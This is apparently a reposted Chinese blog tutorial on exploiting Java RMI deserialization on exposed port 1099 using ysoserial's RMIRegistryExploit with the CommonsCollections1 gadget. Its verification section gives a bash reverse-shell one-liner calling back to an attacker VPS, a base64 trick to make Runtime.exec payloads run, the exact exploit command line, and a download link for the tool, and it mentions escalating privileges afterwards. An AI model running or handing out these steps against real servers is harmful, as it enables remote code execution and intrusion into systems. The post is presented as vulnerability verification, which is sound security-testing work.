JAVA

JAVA,第1张

JAVA 一、漏洞原理

RMI是REMOTE METHODINVOCATION的简称,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象,可以从另一个JAVA虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。对于任何一个以对象为参数的RMI接口,你都可以发一个自己构建的对象,迫使服务器端将这个对象按任何一个存在于class path中的可序列化类来反序列化。 RMI的传输100%基于反序列化。

二、漏洞详情

1099端口是Java RMI的默认端口,RMI默认使用序列化来完成所有的交互,所以这是非常常见的漏洞。如果该端口暴露在公网上,且使用了Apache Commons Collections的漏洞版本,就可以在该服务器上执行相关命令。此处尝试利用ysoserial进行漏洞分析。

工具下载链接(永久有效)

链接:https://pan.baidu.com/s/1n8aVs5EjlWkR59u0XdXWbQ

提取码:6666

三、验证漏洞

这里我们尝试反dshell.

首先在vps上面监听端口

反d到vps上 bash -i >& /dev/tcp/ip/port 0>&1

注意:有时命令执行有效载荷Runtime.getRuntime().exec()会失败。当使用 web shell、反序列化漏洞或通过其他向量时,可能会发生这种情况。在 base64 编码的帮助下,下面的转换器可以帮助减少这些问题。它可以通过调用 Bash 或 PowerShell 再次使管道和重定向变得更好,它还确保参数中没有空格。

base编码转换地址:https://www.jackson-t.ca/runtime-exec-payloads.html

本机cmd执行命令

把刚才经过base64编码生成的命令替换下面的“命令”。(通过漏扫设备已知改了默认端口,端口改为6200)

java cp ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.RMIRegistryExploit host port CommonsCollections1 "命令"

反dshell成功,证明存在此漏洞。(获得的权限无法退格,后续可以通过提权进一步发掘)

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/zaji/5684664.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-17
下一篇 2022-12-17

发表评论

登录后才能评论

评论列表(0条)

保存